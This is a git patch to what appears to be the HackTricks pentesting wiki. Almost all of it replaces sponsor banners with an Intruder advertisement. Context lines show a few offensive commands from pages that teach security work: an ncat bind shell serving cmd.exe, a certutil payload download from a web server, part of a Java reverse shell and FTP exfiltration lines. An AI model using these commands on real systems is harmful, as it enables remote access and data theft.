From 2463753c56bb3434f27d3c6dd91ab460de98d9b5 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Sun, 3 Sep 2023 01:48:41 +0200 Subject: [PATCH] intruder --- .../exfiltration.md | 26 ++++++---- .../python/bypass-python-sandboxes/README.md | 52 ++++++++++--------- .../shells/linux.md | 23 ++++++++ .../shells/windows.md | 49 ++++------------- .../android-applications-basics.md | 51 +++++------------- .../android-task-hijacking.md | 14 +++++ .../make-apk-accept-ca-certificate.md | 13 +++++ mobile-pentesting/android-checklist.md | 30 +++++------ .../pentesting-ftp/README.md | 16 ++++++ .../pentesting-imap.md | 15 ++++++ .../README.md | 50 +++++------------- network-services-pentesting/pentesting-pop.md | 14 +++++ .../pentesting-smb/rpcclient-enumeration.md | 15 ++++++ .../pentesting-web/php-tricks-esp/php-ssrf.md | 15 ++++++ .../pentesting-web/tomcat.md | 15 ++++++ .../tomcat/basic-tomcat-info.md | 15 ++++++ pentesting-web/bypass-payment-process.md | 17 +++++- ...g-and-directory-interface-and-log4shell.md | 15 ++++++ pentesting-web/formula-doc-latex-injection.md | 15 ++++++ pentesting-web/h2c-smuggling.md | 15 ++++++ pentesting-web/hacking-with-cookies/README.md | 15 ++++++ .../cloud-ssrf.md | 23 ++++++++ .../url-format-bypass.md | 16 ++++++ .../css-injection/css-injection-code.md | 14 +++++ .../abusing-service-workers.md | 15 ++++++ reversing/common-api-used-in-malware.md | 14 +++++ .../reversing-tools-basic-methods/README.md | 24 +++++++++ stego/stego-tricks.md | 19 ++++--- todo/radio-hacking/flipper-zero/README.md | 15 ++++++ todo/radio-hacking/flipper-zero/fz-nfc.md | 15 ++++++ todo/radio-hacking/flipper-zero/fz-sub-ghz.md | 16 +++++- todo/radio-hacking/proxmark-3.md | 15 ++++++ .../acl-persistence-abuse/README.md | 23 ++++++++ .../lateral-movement/dcom-exec.md | 15 ++++++ .../powerup.md | 12 +++++ 35 files changed, 550 insertions(+), 176 deletions(-) diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index de81c8c35..a01f3f9ba 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -12,10 +12,13 @@ -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +
-{% embed url="https://go.intigriti.com/hacktricks" %} +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** ## Commonly whitelisted domains to exfiltrate information @@ -176,10 +179,13 @@ echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +
-{% embed url="https://go.intigriti.com/hacktricks" %} +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** ## SMB @@ -388,10 +394,12 @@ Now we just copy-paste the text into our windows-shell. And it will automaticall * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -{% embed url="https://go.intigriti.com/hacktricks" %}
diff --git a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index b02ce5e4e..38b197b73 100644 --- a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -1,13 +1,5 @@ # Bypass Python sandboxes -![](<../../../.gitbook/assets/image (9) (1) (2).png>) - -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ @@ -20,6 +12,14 @@ Get Access Today:
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + These are some tricks to bypass python sandbox protections and execute arbitrary commands. ## Command Execution Libraries @@ -348,13 +348,13 @@ with (a as b): pass ``` -![](<../../../.gitbook/assets/image (9) (1) (2).png>) +
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** ## Builtins @@ -734,13 +734,13 @@ You can check the output of this script on this page: [Broken link](broken-reference) {% endcontent-ref %} -![](<../../../.gitbook/assets/image (9) (1) (2).png>) +
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** ## Python Format String @@ -1132,6 +1132,15 @@ will be bypassed * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html) * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) + +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ @@ -1144,10 +1153,3 @@ will be bypassed
-![](<../../../.gitbook/assets/image (9) (1) (2).png>) - -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/generic-methodologies-and-resources/shells/linux.md b/generic-methodologies-and-resources/shells/linux.md index 83001dd55..847c69ace 100644 --- a/generic-methodologies-and-resources/shells/linux.md +++ b/generic-methodologies-and-resources/shells/linux.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + **If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com) ## Full TTY @@ -170,6 +178,14 @@ victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl attacker> ncat -v 10.0.0.22 4444 --ssl ``` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Golang ```bash @@ -358,6 +374,13 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %} +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md index c8f88f0bf..e39e7d9a7 100644 --- a/generic-methodologies-and-resources/shells/windows.md +++ b/generic-methodologies-and-resources/shells/windows.md @@ -12,22 +12,13 @@
-
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## Lolbas @@ -329,22 +320,14 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil **Detected by defender** -
-**HackenProof is home to all crypto bug bounties.** +
-**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## **Cscript/Wscript** @@ -590,22 +573,12 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive ​ -
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %}
diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md index 6f965060b..e9e70cdac 100644 --- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md @@ -12,22 +12,13 @@
-
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## Android Security Model @@ -136,22 +127,13 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers **Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term β€œSmali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**. -
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## Intents @@ -470,22 +452,13 @@ MDM or Mobile Device Management are software suits that are used to **ensure a c Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data. -
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +***
diff --git a/mobile-pentesting/android-app-pentesting/android-task-hijacking.md b/mobile-pentesting/android-app-pentesting/android-task-hijacking.md index e7a9cff52..e6366c0a7 100644 --- a/mobile-pentesting/android-app-pentesting/android-task-hijacking.md +++ b/mobile-pentesting/android-app-pentesting/android-task-hijacking.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Task, Back Stack and Foreground Activities A task is a collection of activities that users interact with when performing a certain job. The activities are arranged in a stackβ€”the _**back stack**_)β€”in the order in which each activity is opened. @@ -88,6 +96,12 @@ Setting **`taskAffinity=""`** can be a quick fix for this issue. The launch mode * [**https://blog.dixitaditya.com/android-task-hijacking/**](https://blog.dixitaditya.com/android-task-hijacking/) * [**https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html**](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md index f076ce4bf..f4e34b148 100644 --- a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md +++ b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md @@ -16,6 +16,13 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** Some applications don't like user downloaded certificates, so in order to inspect web traffic for some apps we actually have to decompile the application & add a few things & recompile it. @@ -62,6 +69,12 @@ Then save the file & back out of all the directories & rebuild the apk with the Finally, you need just to **sign the new application**. [Read this section of the page Smali - Decompiling/\[Modifying\]/Compiling to learn how to sign it](smali-changes.md#sing-the-new-apk). +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} +
diff --git a/mobile-pentesting/android-checklist.md b/mobile-pentesting/android-checklist.md index 8bd7d3806..f0655cdf8 100644 --- a/mobile-pentesting/android-checklist.md +++ b/mobile-pentesting/android-checklist.md @@ -1,13 +1,5 @@ # Android APK Checklist -![](<../.gitbook/assets/image (9) (1) (2).png>) - -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ @@ -20,6 +12,14 @@ Get Access Today:
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ### [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals) * [ ] [Basics](android-app-pentesting/#fundamentals-review) @@ -74,6 +74,13 @@ Get Access Today: * [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code) + +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ @@ -86,10 +93,3 @@ Get Access Today:
-![](<../.gitbook/assets/image (9) (1) (2).png>) - -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/network-services-pentesting/pentesting-ftp/README.md b/network-services-pentesting/pentesting-ftp/README.md index 7debb5e52..ca748ff3e 100644 --- a/network-services-pentesting/pentesting-ftp/README.md +++ b/network-services-pentesting/pentesting-ftp/README.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Basic Information The **File Transfer Protocol (FTP**) is a standard network protocol used for the transfer of computer files between a client and server on a computer network.\ @@ -229,6 +237,14 @@ The default configuration of vsFTPd can be found in `/etc/vsftpd.conf`. In here, * `ftp` * `port:21` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## HackTricks Automatic Commands ``` diff --git a/network-services-pentesting/pentesting-imap.md b/network-services-pentesting/pentesting-imap.md index 87ec7b014..c507472ab 100644 --- a/network-services-pentesting/pentesting-imap.md +++ b/network-services-pentesting/pentesting-imap.md @@ -16,6 +16,14 @@ +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Internet Message Access Protocol As its name implies, IMAP allows you to **access your email messages wherever you are**; much of the time, it is accessed via the Internet. Basically, email **messages are stored on servers**. Whenever you check your inbox, your email client contacts the server to connect you with your messages. When you read an email message using IMAP, **you aren't actually downloading** or storing it on your computer; instead, you are **reading it off of the server**. As a result, it's possible to check your email from **several different devices** without missing a thing. @@ -204,6 +212,13 @@ Entry_4: Command: msfconsole -q -x 'use auxiliary/scanner/imap/imap_version; set RHOSTS {IP}; set RPORT 143; run; exit' ``` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index eba355e1f..45e4fbf2e 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -12,22 +12,13 @@
-
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## Basic Information @@ -388,22 +379,14 @@ It's possible to **load a .NET dll within MSSQL with custom functions**. This, h There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql). -
-**HackenProof is home to all crypto bug bounties.** +
-**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## MSSQL Privilege Escalation @@ -541,22 +524,13 @@ You probably will be able to **escalate to Administrator** following one of thes ​ -
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## HackTricks Automatic Commands diff --git a/network-services-pentesting/pentesting-pop.md b/network-services-pentesting/pentesting-pop.md index 96da95e95..2b413eed9 100644 --- a/network-services-pentesting/pentesting-pop.md +++ b/network-services-pentesting/pentesting-pop.md @@ -12,6 +12,14 @@ +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Basic Information **Post Office Protocol** (**POP**) is a type of computer networking and Internet standard **protocol** that extracts and retrieves email from a remote mail server for access by the host machine. **POP** is an application layer **protocol** in the OSI model that provides end users the ability to fetch and receive email (from [here](https://www.techopedia.com/definition/5383/post-office-protocol-pop)). @@ -151,6 +159,12 @@ Entry_6:
+
